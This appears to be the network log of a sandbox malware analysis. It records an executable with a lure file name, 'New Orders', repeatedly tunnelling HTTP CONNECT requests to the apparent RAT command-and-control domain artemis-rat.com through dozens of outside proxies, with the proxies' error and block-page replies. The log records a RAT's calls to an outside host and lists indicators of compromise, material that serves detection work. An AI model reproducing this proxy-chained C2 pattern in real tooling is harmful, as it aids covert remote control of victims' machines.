                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.797791004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        772192.168.2.95225954.233.119.17231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.798094034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.119577885 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        773192.168.2.952315119.196.168.183807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.798310041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.102796078 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        774192.168.2.94996935.237.210.21531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.798537970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.870516062 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        775192.168.2.952378147.75.92.24494017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.799163103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.075438023 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        776192.168.2.95231151.38.63.124272947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.799261093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        777192.168.2.95224895.66.138.2188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.799889088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        778192.168.2.952400129.213.150.205807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.799889088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        779192.168.2.952301185.38.111.180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.802229881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.123642921 CET75INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:43.487533092 CET103INHTTP/1.1 400 Bad Request
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Connection: close
                                                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                        Data Ascii: 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        780192.168.2.949883146.59.202.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.802333117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835788012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945746899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945575953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.945091009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.947345972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.945358992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:54.960769892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:42.960711956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        781192.168.2.95239072.10.160.170295857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.802669048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        782192.168.2.95235458.75.126.23541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.802789927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        783192.168.2.95239467.43.227.226151437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.802997112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        784192.168.2.952480104.20.34.100807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.805831909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.960402012 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        785192.168.2.952512172.67.182.38807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.810422897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.965017080 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        786192.168.2.95235061.92.189.15807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.810904026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        787192.168.2.952319116.62.147.24931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.812560081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.663897038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.993906975 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        788192.168.2.952430146.19.106.193123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.812717915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        789192.168.2.95228691.134.140.160325887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.813435078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        790192.168.2.95238668.1.210.16341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.813582897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        791192.168.2.952175175.183.82.22181937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.813648939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        792192.168.2.95239567.201.33.10252837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.814519882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        793192.168.2.952339192.162.232.1510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.815447092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        794192.168.2.952056122.114.232.1378087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.816946983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        795192.168.2.952303202.162.219.1010807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.817140102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        796192.168.2.952267185.237.206.20431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.817342997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.128422022 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        797192.168.2.952554104.21.102.95807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.817576885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.971683979 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
